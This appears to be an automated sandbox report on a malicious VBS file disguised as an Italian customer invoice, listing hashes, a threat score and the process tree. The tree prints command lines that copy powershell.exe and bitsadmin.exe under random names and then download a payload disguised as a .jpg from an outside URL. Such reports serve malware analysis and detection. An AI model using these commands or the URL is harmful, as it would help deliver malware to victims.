Analysis
-
max time kernel
137s -
max time network
52s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
13-07-2020 07:45
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_STRPRI81C06H264H.vbs
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_STRPRI81C06H264H.vbs
Resource
win10v200430
0 signatures
0 seconds
General
-
Target
Fatt_cliente_STRPRI81C06H264H.vbs
-
Size
3KB
-
MD5
f8f845a5680b862bb8cbc3f0963e8a24
-
SHA1
132a39312e13dafab31cca938c64745fd7a82b29
-
SHA256
e9d30232236a8c05a58a9cc13ef79a0d360213ef096f69a3b9f7199e4b458df3
-
SHA512
e5772c837fae26bb4cf2cd8b4c0adae3f652faf74afed8fe7894fffea2eedce0296c147bef58e1a24c3239bf9ed076c4747c1263d4b472172a1469d2c6afe430
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WScript.exedescription pid process target process PID 992 wrote to memory of 3828 992 WScript.exe cmd.exe PID 992 wrote to memory of 3828 992 WScript.exe cmd.exe PID 992 wrote to memory of 1148 992 WScript.exe cmd.exe PID 992 wrote to memory of 1148 992 WScript.exe cmd.exe PID 992 wrote to memory of 1340 992 WScript.exe iXRgjlH.exe PID 992 wrote to memory of 1340 992 WScript.exe iXRgjlH.exe PID 992 wrote to memory of 1340 992 WScript.exe iXRgjlH.exe -
Executes dropped EXE 1 IoCs
Processes:
iXRgjlH.exepid process 1340 iXRgjlH.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_STRPRI81C06H264H.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ziXRgjlH.exe2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\iXRgjlH.exe2⤵
-
C:\Users\Admin\AppData\Roaming\iXRgjlH.exe"C:\Users\Admin\AppData\Roaming\iXRgjlH.exe" /transfer pJVFLY /download https://peliculadeestreno.com/libuna/STRPRI81C06H264H/en.jpg C:\Users\Admin\AppData\Roaming\en.jpg2⤵
- Executes dropped EXE